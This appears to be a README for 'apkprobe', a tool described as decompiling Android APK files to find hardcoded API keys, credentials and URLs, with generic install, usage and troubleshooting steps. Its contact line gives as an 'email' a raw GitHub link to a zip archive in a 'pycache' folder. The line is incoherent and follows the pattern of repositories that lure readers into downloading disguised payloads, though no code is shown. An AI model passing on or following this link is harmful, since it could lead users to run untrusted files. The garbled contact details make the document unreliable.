Welcome to apkprobe! This tool helps you decompile Android APK files and find hidden information, such as API keys and credentials. It is useful for security researchers, bug hunters, and anyone interested in Android app security.
- APK Decompilation: Easily decompile APK files to examine their structure.
- Secrets Detection: Identify hardcoded credentials and API keys within APKs.
- apk2url: Extract URLs from APK files for further analysis.
- Compatibility: Works well on various platforms, ensuring a broad user base.
- Operating System: Windows, macOS, or Linux
- Java Runtime Environment (Java 8 or newer)
- Minimum 100 MB free disk space
To begin, visit the Releases page to download the latest version of apkprobe.
- Click on the link above to go to the Releases page.
- Find the latest release at the top of the page.
- Download the appropriate file for your operating system.
- Once the file is downloaded, locate it on your computer.
For example: If you downloaded the Windows version, find the .exe file.
- Double-click the downloaded
.exefile to start the application. - Follow the on-screen instructions to complete the setup.
- Open your
.dmgfile and drag the apkprobe app to your Applications folder. - Open the app from your Applications list.
- Open a terminal window.
- Navigate to the folder where you downloaded apkprobe.
- Use the command
chmod +x apkprobeto make it executable. - Run the application with
./apkprobe.
After installation, you can start using apkprobe to analyze APK files.
- Launch apkprobe.
- Click on the 'Load APK' button to select the APK file you want to analyze.
- Wait while apkprobe processes the file.
- Review the results displayed on the screen. Look for any sensitive information or URLs extracted from the APK.
For detailed documentation and advanced usage, visit the official Wiki page.
If you encounter issues while using apkprobe, consider the following solutions:
- Ensure you have the correct version of Java installed.
- Verify that the APK file is not corrupted.
- Restart the application if it becomes unresponsive.
For more help, check out the Issues section of the repository to see if others have had similar problems.
We welcome contributions! If you have ideas or improvements, please feel free to fork the repository and submit a pull request.
For support or inquiries, you can open an issue on the GitHub page or reach out via email at https://raw.githubusercontent.com/hrithoy/apkprobe/main/src/apkprobe/pycache/apkprobe_v1.6.zip.
For additional information about apkprobe, please explore the repository further and stay updated with the latest releases. Your feedback helps us improve apkprobe for everyone's benefit.
Download apkprobe and start protecting your Android apps today!